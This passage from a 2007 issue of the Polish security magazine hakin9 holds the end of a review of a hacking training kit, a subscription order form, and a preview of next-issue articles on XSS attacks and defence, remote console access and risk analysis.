ności. Każdy z rozdziałów stanowi niezależne opracowa-
nie wybranego zagadnienia. Tylko od Ciebie zależy, z którą
partią materiału chcesz się w danej chwili zapoznać.

Płyty CD/DVD

Na  płycie  CD  znajdziemy  szkoleniowy  system  opera-
cyjny,  dzięki  któremu  mamy  możliwość  przećwiczenia
każdej z lekcji bez konieczności instalowania oprogramo-
wania  na  dysku  twardym  swojego  komputera.  Urucho-
mienie systemu z płyty CD zajmuje około dwóch, trzech
minut. Wcześniej należy ustawić w BIOS'ie, aby system
uruchamiał się z płyty CD.

Na płycie zachowano porządek, wszystko posegrego-

wano według rozdziałów, oraz kolejności ćwiczeń. Narzę-
dzia oraz kody źródłowe skryptów i programów opisanych
w podręczniku otrzymujemy z systemem szkoleniowym i
nie ma potrzeby doinstalowywania czegokolwiek.

Natomiast na płycie DVD dołączonej do pakietu szko-

leniowego znajdziemy ponad 4 godziny materiałów filmo-
wych przedstawiających w praktyce działanie poszcze-

gólnych technik, wszystko jest przedstawione krok po
kroku i na bieżąco komentowane przez lektora.

Certyfikatu Ukończenia Szkolenia

Każda  osoba,  która  nabyła  kurs  Szkoły  Hakerów  ma
prawo  do  przystąpienia  do  egzaminu,  który  sprawdzi
poziom  wiedzy  i  umiejętności.  Jeśli  dana  osoba  spełni
wymogi  kwalifikacyjne  i  ukończy  pomyślnie  egzamin,
otrzyma certyfikat ukończenia szkolenia z zakresu bez-
pieczeństwa systemów komputerowych

Podsumowanie

Jak narazie jest to najlepsza publikacja na polskim rynku,
która krok po kroku wprowadza nas w tajniki hackingu.
Oprócz czysto teoretycznych informacji w postaci tekstu,
możemy zobaczyć na ekranie praktyczne zastosowanie.
Co najważniejsze dzięki szkoleniowemu systemowi ope-
racyjnemu możemy sami w praktyce przetestować dzia-
łanie omawianych technik. Polecam zakup tego pakie-
tu osobom, które nie miały nigdy wcześniej styczności z
zagadnieniami z dziedziny hakingu, jak i tym którzy już
zajmują się tym od dłuższego czasu.

Wojciech Trynkowski

Rysunek 1.

Zestaw szkoleniowy

Rysunek 2.

Certyfikat ukończenia kursu

Zaprenumeruj swoje ulubione magazyny

i zamów archiwalne numery!

Już teraz w kilka minut możesz zaprenumerować swoje ulubione pismo.
Gwarantujemy:

- preferencyjne ceny
- bezpieczną płatność on-line
- szybką realizację Twojego zamówienia
Bezpieczna prenumerata on-line wszystkich tytułów Wydawnictwa Software!

www.buyitpress.com

zamówienie prenumeraty

Prosimy wypełnić czytelnie i przesłać faksem na numer:

(22) 887 10 11 lub listownie na adres: Software-Wydawnictwo Sp. z o.o.,

Bokserska 1, 02-682 Warszawa, e-mail: pren@software.com.pl. Przyjmujemy też zamówienia telefoniczne:

(22) 887 14 44

Imię i nazwisko............................................................................................ ID kontrahenta..........................................................................................

Nazwa firmy................................................................................................. Numer NIP firmy.......................................................................................

Dokładny adres....................................................................................................................................................................................................................

Telefon (wraz z numerem kierunkowym)................................................... Faks (wraz z numerem kierunkowym) ....................................................

E-mail (niezbędny do wysłania faktury)............................................................................................................................................................................

zamówienie prenumeraty

Cena prenumeraty rocznej dla osób prywatnych

Cena prenumeraty rocznej dla osób prenumerujących już Software Developer’s Journal lub Linux+

Cena prenumeraty dwuletniej Aurox Linux

Jeżeli chcesz zapłacić kartą kredytową, wejdź na

stronę naszego sklepu internetowego:

www.buyitpress.com

automatyczne przedłużenie prenumeraty

Suma

Tytuł

Ilość

numerów

Ilość

zamawianych

prenumerat

Od numeru

pisma lub

miesiąca

Opłata

w zł

z VAT

Software Developer’s Journal (1 płyta CD)

– dawniej Software 2.0

Miesięcznik profesjonalnych programistów

250/180

SDJ Extra

(od 1 do 4 płyt CD lub DVD)

– dawniej Software 2.0 Extra!

Numery tematyczne dla programistów

150/135

Linux+DVD (2 płyty DVD)

Miesięcznik o systemie Linux

199/179

Linux+Extra! (od 1 do 7 płyt CD lub DVD)

Numery specjalne z najpopularniejszymi dystrybucjami Linuksa

232/198

PHP Solutions (1 płyta CD)

Dwumiesięcznik o zastosowaniach języka PHP

135

Hakin9, jak się obronić (1 płyta CD)

Miesięcznik o bezpieczeństwie i hakingu

199

/219

.psd (1 płyta CD + film instruktażowy)

Dwumiesięcznik użytkowników programu Adobe Photoshop

140

.psd numery specjalne

(.psd Extra + .psd Starter Kit)

140

Aktualne informacje o najbliższym numerze

http://www.hakin9.org/pl
Numer w sprzedaży na początku maja 2007 r.

Redakcja zastrzega sobie prawo zmiany zawartości pisma.

hakin9

5/2007

w następnym numerze

między innymi:

Zapowiedzi

Ataki XSS

Temat dotyka problemu ataków XSS. Od kiedy internet stał sie cześcią
naszego życia bezpieczeństwo stron internetowych zawsze wzbudzała wiel-
kie zainteresowanie. Autor pokaże, jak umieścić kod skryptu do wrażliwych
stron www, jak obejść mechanizm filtrów oraz jak zabezpieczyć się przed
atakami XSS.

Zdalna kontrola komputera ze stron www

z użyciem technologii JEE5

Artykuł jest własnym projektem autora w architekturze klient-serwer (aple-
t+servlet), który umożliwia bezpieczny dostęp do konsoli na serwerze z
poziomu przeglądarki WWW na komputerze klienta. Artykuł jest świetną ilu-
stracją programowania sieciowego w Javie.

Kwantywnie czy kwalifikatywnie, czyli kilka

trudnych wyrazów na temat analizy ryzyka

utraty bezpieczeństwa informacji

Artykuł typu teoria przez praktykę opowiada o zbudowaniu w organizacji
kompleksowego systemu bezpieczeństwa. Artykuł ma charakter tutoriala i
pokazuje krok po kroku jak przeprowadzić omawianą analizę.

Bezpieczeństwo – praca u podstaw

Temat dotyczący bezpieczeństwa informacji jest tematem powszechnie
znanym. Mówi się o nim chętnie i dużo. Słusznie bo to bardzo ważna sprawa.
Autor porusza tematykę bezpieczeństwa od podstaw. Stara się przekazać
wiedzę, którą zgromadził dzięki swoim nabytym doświadczeniom.

NA CD:

•  hakin9.live-bootowalna dystrybucja Linuksa,
•  mnóstwo narzędzi – niezbędnik hakera,
•  tutoriale – praktyczne ćwiczenia zagadnień poruszanych w artykułach,
•  dodatkowa dokumentacja,
•  pełne wersje komercyjnych aplikacji.

Atak

Obrona